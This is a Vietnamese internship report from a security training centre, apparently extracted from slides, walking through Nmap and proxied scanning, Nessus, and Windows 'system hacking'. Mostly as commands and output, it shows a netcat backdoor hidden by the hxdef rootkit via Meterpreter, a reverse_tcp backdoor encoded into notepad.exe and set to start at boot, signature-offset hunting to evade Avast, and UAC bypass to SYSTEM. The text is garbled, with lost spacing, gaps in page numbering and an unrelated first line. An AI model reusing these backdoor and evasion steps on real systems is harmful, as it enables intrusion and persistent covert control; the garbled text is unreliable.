Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Bao cao thuc tap athena tuan 1 2-3
1. Đề Tài Thực Tập
SYSTEM HACKING
Người Hướng Dẫn: Thầy Võ Đỗ Thắng
Người Thực Hiện Đề Tài: PHẠM HOÀNG HẢI
2. MỤC LỤC
I – Giới Thiệu
1.0 Giới thiệu về ATHENA……………………………3
1.1 Giới thiệu về System Hacking………………..........7
II – Nội Dung Thực Tập Tại ATHENA
2.0 Hướng dẫn cài VMware và BackTrack 5r3………...8
2.1 SCANNING……………………………………….25
2.2SYSTEM HACKING……………………………...64
2.3TROJAN…………………………………………...89
3. GIỚI THIỆU
1.0 – Giới Thiệu Về ATHENA
Lịch sử:
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc
Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí
thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh
vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa
công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước
nhà .
Lĩnh Vực Hoạt Hộng Chính:
+ Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn
quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI ,
CEH,... Song song đó, trung tâm ATHENA còn có những chương trình
đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ
Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính
phủ, tổ chức tài chính,…..
+ Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống
mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin -
Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu
điện các tỉnh,.....
4. + Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều
chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại
học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân
Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn
thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......
Đội Ngũ Giảng Viên:
+Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các
trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều
phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP,
Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified
Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham
gia giảng dạy tại trung tâm ATHENA
+Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật
kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan,
Singapore,... và truyền đạt các công nghệ mới này trong các chương trình
đào tạo tại trung tâmATHENA
5.
6. 1.1 – Giới Thiệu Về System Hacking
Hiện nay, rất nhiều người sử dụng máy tính hệ điều hành Windows
như WIN XP, WIN 7 và các ứng dụng văn phòng như Microsoft Office
2003,2007,… cho công việc hang ngày.
Tuy nhiên những hệ điều hành trên và các ứng dụng Microsoft Office
đó sẽ có những lỗ hổng bảo mật.
Và các hacker sẽ lợi dụng điều đó để xâm nhập trái phép vào máy nạn
nhân để đánh cắp thông tin cũng như phá hoại.
Đề tài System Hacking này sẽ giúp các bạn hiểu được cách hacker
xâm nhập và khai thác các lỗ hổng trên như thế nào.
Và làm sao có thể khắc phục được các lỗ hổng và bảo vệ được máy
của mình nếu như có xâm nhập trái phép xảy ra.
7. NỘI DUNG THỰC TẬP
2.0 – Hướng dẫn cài VMware và BackTrack 5r3
Cài VMware:
Bước 1: Các bạn download phần mềm VMware worksations trên mạng
về và cài đặt như bình thường.
Bước 2: Thiết lập CẤU HÌNH MÁY ẢO cho phần mềm:
Chọn Create a new virtual Machine:
8. Chọn Next, rồi chọn i will install the operating system later
Chọn Next, chọn HDH mà bạn muốn cài, ở đây mình chọn WINXP
9. Chọn Next > chọn Browse để lưu file ( chọn ổ nào trống tầm 10G là đẹp ko
nhất thiết là ổ đĩa C )
10. Nhấn Next chọn dung lượng ổ cứng (cái này tùy mọi người chọn nhé )
11.
12. Chọn Next > chọn custumize hardware, mục này nhiều cái hay lắm
Xong rùi chọn Close rồi chọn Finish là xong!
13. Bước 3: CÀI HỆ ĐIỀU HÀNH CHO MÁY ẢO
Cài trực tiếp từ đĩa winxp.iso,vào menu VM chọn settings chọn CD/DVD
chọn đường dẫn là đĩa winxp.iso cần cài:
14. Chọn OK rùi chọn nút màu xanh như hình dưới chọn power on để cài Win.
15. Quá trình cài windows y chang cài trên máy thật thế là xong
24. Nhập vào đoạn text sau để chuyển sang giao diện đồ họa [startx]
Click chọn install trên desktop để tiếp tục cài đặt các thông số như ngày giờ,
ổ đĩa và ngôn ngữ > Xong.
Nếu muốn sử dụng lệnh thì có thể mở Terminal.Hình màu đen ở thanh trên
cùng nhỏ nhỏ
25. SCANNING
Bài1: Nmap Scanning
1. Mục Đích:
- PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đã đượcinstall mặc
địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể
installtrênWindow vàLinux.
- Mụcđíchbàilab: sử dụngNmapđểxácđịnhcácthôngsố hệ điềuhành, port, dịchvụ
tươngứngvới…
- Nmaplà mộttrongnhững networkscannerrất hiệuquả.Thông quanmapta có
thểthực hiện quátrìnhscanvới cáckỹ thuậtkhácnhaunhư SYN scan,TCP
Connectionscan,Xmas scan,Null scan…
2. Cácbướcthựchiện
- Ta có thểsử dụngnmaphỗ giao diệnđồ họavàgiao diệndònglệnh. Giao diện
dòngđồ họasửdụng chươngtrìnhzendmap.Cònở giao diệndònglệnhthìta sử dụng
câulệnh nmap.
26. - Bước1:taxemgiúp đỡ của câulệnh NMAP
- Bước2:thựchiện quátrìnhpingsweep cho đường mạng192.168.1.0/24để
xácđịnhcác hostđang có trongđường mạng bằngcâulệnh“nmap -sP-v
172.16.34.1/24”
27. - Bước3:Ta cần xácđịnhxemở IP172.16.34.18đang có nhưngport nào đang
mở.Đểlàmviệcnày ta có thể sử dụngcácdạngscankhácnhau. Vídụở đây tasử
dụngkỹthuậtSYN scanvới câulệnh “nmap –sS172.16.34.18”
28.
29. - Bước4:xácđịnhgiátrị porttrongquátrìnhscan. Mặcđịnhchươngtrìnhsẽ scantất
cảcác port. Ví dụtacần xácđịnh trongđườngmạng172.16.34.1/24 thìđang có
bao nhiêumáyđangmở port445,139,80,3389tacó thểsử dụng câulệnh “nmap-
sT -p 445,139,3389172.16.34.1/24”
30. - Bước5:Sử dụngnmapscanđường mạngvới IPPublic bên ngoài với câulệnh
“nmap -sS-p 80222.253.166.1/24> /root/Desktop/scan_adsl.txt” . Như vậy
kết quảscansẽđượcghi thànhfile scan_adsl.txt
31. - Bước6:Sử dụngnmapđểxácđịnhcác thôngsố của cácứng dụngđượctriển khai
trênserver. Ta sử dụng“nmap-p 1-65535-T4-A -v192.168.0.4”
32.
33. - Bước7:Trong nmaphỗ trợ sử dụng các scriptsđểnscanmột lỗi ứng dụng nào đó.
Đầutiênta có thểsử dụng câu lệnh “locatenmap” đểxácđịnhcácfilescript
đangđượchỗ trợ trong nmap. Ví dụ ta cóthểsử dụngkiểm tralỗi ms08-067của
cácmáytrongđườngmạng“nmap -sT --script smb-check-vulns.nse -p 139,445
172.16.34.1/24”
Ngoài ra ta có thể kiểmtraxemtrongmạng có máy nào đangchuyểncard mạng
sangPromicious modeđểsniffertraffictrênđườngtruyền“nmap --script sniffer-
detect172.16.34.1/24”
34. - Bước8:Trong quátrìnhscanta nênthayđổi cácgiátrị IPsource,lưulượnggói tingửi
trongthời gian1giây, thực hiện phânmảnh gói tin,giảthôngsố ttl. Vídụ
38. - PCattacker sửdụnghệđiềuhành BackTrack5,trongđó đã đượcinstall mặc
địnhchươngtrìnhnmap. Ngoài ratacó thểdownloadvà càiđặt nmap có thể
installtrênWindow vàLinux.
- Mụcđíchbàilab: tacấuhình côngcụproxychainlàmlocal proxy chươngtrình
nmap. Proxy chainsẽkết nốiđếnmột Proxy Server ngoài mạnginternet. Như
vậythì nmapsẽscan victimserverthông quamột proxy server.
2. Cácbướcthựchiện
- Bước1:Install và Configure Proxychains.Nếunhư máylinux ta chưacó install
39. Proxychains,tathựcthi câulệnhbên dưới
nhanld@nhanld-laptop:~$sudo su
[sudo]password for nhanld:
root@nhanld-laptop:/home/nhanld# apt-get installproxychains
Vịtrí file cấuhình cho proxychainstại /etc/proxychains.conf
nhanld@nhanld-laptop:~$gedit /etc/proxychains.conf
Tasẽbỏ dấu# trướcdòngstrict_chaintrongfile cấuhình.
Tìmkiếmmộtsố trangwebcungcấp proxyserver.Proxychains hỗ trợ cácphương
thứclà HTTPProxy,SOCK 4vàSOCK 5.Tacó thểdùngcáctừ khóađểtìmkiếm
trênGoogle“freeproxy server list” hoặc“freeproxy server listsock”
- CấuhìnhProxyChains hỗ trợ cácdạng Proxy. Vídụ,tasẽthêm mộtsố dòngvào
file/etc/proxychains.conf
http94.23.236.21780 http
83.216.184.132 8080
sock5203.206.173.41080
40. sock485.119.217.1131080
sock4201.55.119.431080
- Bước2:Install Nmaptừ Source. Tacó thểdownloadsourceNmaptừ
trangwebhttp://nmap.org/download.html. Thựchiệnquátrìnhinstall từ source,ta
chọninstall vào đường dẫnlà/opt/nmap
nhanld@nhanld-laptop:~$cd/home/nhanld/Download
nhanld@nhanld-laptop:~$tar xvfnmap-5.51.tar.bz2
nhanld@nhanld-laptop:~$cdnmap-5.51
nhanld@nhanld-laptop:~$mkdir /opt/nmap
nhanld@nhanld-laptop:~/Downloads/nmap-5.51$./configure–
41. prefix=/opt/nmap
nhanld@nhanld-laptop:~/Downloads/nmap-5.51$make
nhanld@nhanld-laptop:~/Downloads/nmap-5.51$sudo makeinstall
- Bước3:dùng Nmapscanthông quaProxychains. Đểthựchiện câulệnhscan
bằngtool nmapthông qua proxychains,ta nhậpvào câulệnh proxychains và
tiếptheolà câulệnhcủaNmap
root@nhanld-laptop:/home/nhanld/Downloads/nmap-5.51#proxychains
nmap -sS 27.0.12.130
ProxyChains-3.1(http://proxychains.sf.net)
StartingNmap 5.51( http://nmap.org) at 2011-06-1416:27ICT
Warning:File ./nmap-services exists, but Nmap is using
/opt/nmap/share/nmap/nmap-services for securityand consistency
reasons.set NMAPDIR=.togive priorityto files in your local directory
(may affect the other data filestoo).
Nmap scan report for mail.kaka.vn (27.0.12.130)
Host is up (0.11s latency).
Not shown:991closed ports
PORT STATE SERVICE
21/tcp openftp
42/tcp filtered nameserver
43. Bài 3: Nessus Scanning
1. Mục đích bài lab
- Nessus Clientvà Serverta có thể sử dụngtrêncùng1 PC hoặctrên2PC. Máy
victimtrongbài Labsử dụnglà máy Window
44. - Nessuslà mộttrong những côngcụhỗ trợ adminscan các vulnerable của hệ
điềuhành, cácứngdụng… khátốt. Ngoài ra ta có thểsửdụngcáccôngcụ
khácnhư OpenVAS,GFILanguard
2. Cácbướcthựchiện
- Bước1:Đầutiên tasẽdownloadvàđăngkýActivation Codetại trangweb
http://www.tenable.com/products/nessus. Cácthao táccấuhìnhcủa
Nessussẽđượcthựchiệntrên nềngiao diệnweb.
- Bước2:Saukhicàiđặtxong,tasử dụngtrìnhduyệtwebkếtnối vào
https://localhost:8834đểđiềukhiểnNessus
77. +file cấuhìnhđểẩn process của chươngtrìnhnc.exevàfilethựcthi của
chươngtrình
meterpreter>upload/root/Desktop/hxdef100.ini .
[*]uploading: /root/Desktop/hxdef100.ini->.
[*]uploaded :/root/Desktop/hxdef100.ini->.hxdef100.ini
meterpreter >upload/root/Desktop/hxdef100.exe .
[*]uploading: /root/Desktop/hxdef100.exe->.
[*]uploaded :/root/Desktop/hxdef100.exe->.hxdef100.exe
- Start netcatbackdoor thông quanc_scripts.vbs(start2chươngtrìnhlà nc.exe
và cmd.exe)và rootkit
meterpreter >shell
Process 2868created.
Channel28 created.
MicrosoftWindows XP[Version5.1.2600]
(C) Copyright1985-2001Microsoft Corp.
C:WINDOWSHelpnetcat>start nc_scripts.vbs
start nc_scripts.vbs
78. - Kiểmtra portvà cáctiếntrìnhđang hoạtđộngtrongmáybằnglệnhnetstat–
ano vàtasklist thì tathấy portvà dịchvụ bấtthường
79.
80. - Khởi độngrootkitđểẩnprocess nc.exevà ẩnđifilethựcthi củachươngtrình
netcat
C:WINDOWSHelpnetcat>start hxdef100.exe
start hxdef100.exe
- Takiểmtralại process thì thấytiến trìnhnc.exeđã đượcẩnđi.
81. - Attacker sử dụng chươngtrìnhtelnethoặcchươngtrìnhnetcat đểconnect
điềukhiểnmáyattacker
root@bt:/opt/framework3/msf3#telnet192.168.1.114444
Trying192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
83. 5. Tạo ra backdoor vàuploadbằng metasploit
- Ta chuẩn bị mộtfileđểghépbackdoor vào. Vídụtasử dụng chươngtrình
notepad.exe
- Sử dụng câulệnhsauđểtạo ra backdoor
root@bt:/opt/framework3/msf3# ./msfpayload
windows/meterpreter/reverse_tcp
LHOST=192.168.1.10LPORT=4455R |
./msfencode -e x86/shikata_ga_nai -c 3-t exe -x
/root/Desktop/NOTEPAD.EXE-
o /root/Desktop/backdoor_notepad.exe
[*]x86/shikata_ga_nai succeeded withsize317 (iteration=1)
[*]x86/shikata_ga_nai succeeded withsize344 (iteration=2)
[*]x86/shikata_ga_nai succeeded withsize371 (iteration=3)
- Trong metepreter tacó thểsử dụngcâulệnhrun schedulemeđểupload
84. backdoor và cho backdoor startupvới hệthống.
meterpreter>run scheduleme –h
Đểhiểnthị cácgiúp đỡ của câulệnh
meterpreter>run scheduleme -e /root/Desktop/backdoor_notepad.exe-s
[*]Uploading/root/Desktop/backdoor_notepad.exe....
[*]/root/Desktop/backdoor_notepad.exeuploaded!
85. [*]SchedulingcommandC:DOCUME~1nhanldLOCALS~1Tempsvhost72.exe
to runstartup.....
[*]Thescheduledtask has been successfully created
[*]For cleanuprunschtasks /delete/tn syscheck15 /F
- Lúcnàybackdoor notepadđãđượckíchhoạt,tatiếptụcsử dụngtính năng
multi/handlerđểchờ đợi kết nối củavictim
msf exploit(ms10_046_shortcut_icon_dllloader)>use exploit/multi/handler
msf exploit(handler) >set payload windows/meterpreter/reverse_tcp
payload=>windows/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST192.168.1.10
msf exploit(handler)>set LPORT4455
LPORT=>4455
msf exploit(handler)>exploit-j
[*]Exploit runningas backgroundjob.
- Restartlại máyvictim,lúc nàykếtnối màtađãsử dụngthông qualỗi ms10-046
86. đã bị mất. Sauđó victimtự độngtạo rareverser connectionđếnmáyvictim.msf
exploit(handler)>
[*]Sendingstage(752128bytes)to 192.168.1.11
[*]Meterpreter session3opened (192.168.1.10:4455 ->192.168.1.11:1025)at
2011-07-2012:08:20 +0700
- Nếunhư takiểmtradịchvụ và các kếtnối của máyclientthìtasẽthấyđiềubất
thườngở đâylà mộtdịchvụlạ xuất hiện
92. TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
- Theo kết quảmàn hìnhở trênthì từ byte thứ 102000thì chươngtrình
đượcnhận là virus. Taxóahết cácfileđã đượccắt nhỏ.
- Tiếptục tasẽkiểmtraxemtừ byte 101000đến 102000thì như thế nào ?
Tasử dụngkhoảngtănglà100 byte.
- Tascancác filevừa đượctạo ra bằngAvastmộtlầnnữa
93. - Kết quảthuđượclà từ file 101900đến 102000được nhận là virus.
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
98. - Tasẽthayđổi giátrị101819thành mộtgiátrịkhác. Ở đâytasẽđánhthêm vào
2lần phímspacebar.Ta sẽ thấyxuất hiện thêm 2giá trị hexa là2020 trên
màn hình.
TàiliệuHọcHackerMũTrắng-AEHTạiATHENA.GV:LêĐìnhNhân
104. msf exploit(handler)>set LPORT4455
LPORT=>4455
msf exploit(handler)>exploit–j
- Victimthựcthi fileputty_backdoor.exethì tại máyattacker sẽcó được1 kết
nốiđiềukhiển.
- Tiếptục ta nhậpvào câulệnh “run post/windows/escalate/bypassuac” thì
metasploit sẽtạo ra1sessions mới.
- Ta kết nối vào sessionssố 5bằng cách nhậpvào câulệnh“background” và
“sessions–l” và“sessions –i 5”
105. - Thông qua kếtnối mới ta nhậpvào các câulệnhgetprivs,getsystem,getuidđể
ta có quyền systemvới máyvictim.